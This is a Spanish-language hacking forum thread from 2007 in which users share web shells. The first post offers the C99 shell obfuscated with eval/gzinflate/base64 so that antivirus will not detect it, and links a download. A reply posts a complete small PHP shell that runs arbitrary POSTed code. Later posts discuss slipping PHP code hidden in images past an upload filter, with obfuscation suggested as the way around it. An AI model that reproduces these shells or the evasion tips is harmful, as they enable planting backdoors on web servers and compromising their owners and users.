elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  C99 Shell.php cifrado en base 64
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: C99 Shell.php cifrado en base 64  (Leído 20,712 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
C99 Shell.php cifrado en base 64
« en: 21 Junio 2007, 09:17 am »

Conseguí una verción del C99 shell cifrado en su totalidad para no ser descubierto por los antivirus.
Como dice un amigo: Enjoy!

Citar
<? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
[...]
« Última modificación: 22 Junio 2007, 08:40 am por ANELKAOS » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: C99 Shell.php cifrado en base 64
« Respuesta #1 en: 21 Junio 2007, 09:33 am »

excede el limite y no se ve el código completo  >:( lo subo y lo cuelgo... one moment...
------>Post modificado
Listo:
http://rapidshare.com/files/38464292/aAkjd5D-WHK.rar
En línea

laideker

Desconectado Desconectado

Mensajes: 68


09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0


Ver Perfil WWW
Re: C99 Shell.php cifrado en base 64
« Respuesta #2 en: 22 Junio 2007, 05:04 am »

Esta bueno...  ;D ;D ;D
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: C99 Shell.php cifrado en base 64
« Respuesta #3 en: 22 Junio 2007, 12:08 pm »

Mi PHP-Shell...  ;D

Código:
<?php
echo "<br><form method=\"POST\"><center><textarea name=\"var\" cols=\"40\" rows=\"10\"></textarea>
<br><input type=\"submit\"></center></form><p>".
eval(str_replace( ord(166), "'", str_replace( ord(167), "\"", $_POST['var'])))."</p>";
?>
En línea

дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: C99 Shell.php cifrado en base 64
« Respuesta #4 en: 22 Junio 2007, 12:41 pm »

jeje, muy bueno. Una duda ¿la codificación es para burlar los A/V clientes o del server? no entiendo  :xD

Otra, por ejemplo, tengo un server que opera con algún "mod" que cuando intentas subir una "imagen" (con código PHP, véase el tuto de codebreak) me tira error y una advertencia  :xD ¿habrá alguna forma de saltarlo?

Saludos
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: C99 Shell.php cifrado en base 64
« Respuesta #5 en: 22 Junio 2007, 12:46 pm »

Si dices el mensaje quizás podamos ayudarte...
En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: C99 Shell.php cifrado en base 64
« Respuesta #6 en: 22 Junio 2007, 20:10 pm »

Tal vez sea el de LFI???

el de los comentarios en el JPEG? ñ_ñ


Pos, podrias hacer lo mismo que hicieron con esta shell, usar la funcion eval()... (claro, tambien con base64_decode() ) ^^
En línea

дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: C99 Shell.php cifrado en base 64
« Respuesta #7 en: 23 Junio 2007, 07:00 am »

El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx".

No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro.

Saludos
En línea

fitu

Desconectado Desconectado

Mensajes: 208


Ver Perfil WWW
Re: C99 Shell.php cifrado en base 64
« Respuesta #8 en: 23 Junio 2007, 07:11 am »

disculpen mi ignoracia, pero la verdad no entiendo de q se trata  :-[
baje el .rar y no comprendo para q sirve
En línea

Deka_10

Desconectado Desconectado

Mensajes: 196



Ver Perfil
Re: C99 Shell.php cifrado en base 64
« Respuesta #9 en: 23 Junio 2007, 20:46 pm »

disculpen mi ignoracia, pero la verdad no entiendo de q se trata  :-[
baje el .rar y no comprendo para q sirve

entonces para que lo bajas?
En línea

Islam != Terrorism
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cifrado de contraseñas en la base de datos
Criptografía
windic 2 3,682 Último mensaje 14 Septiembre 2015, 01:46 am
por ^DeMoN^
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines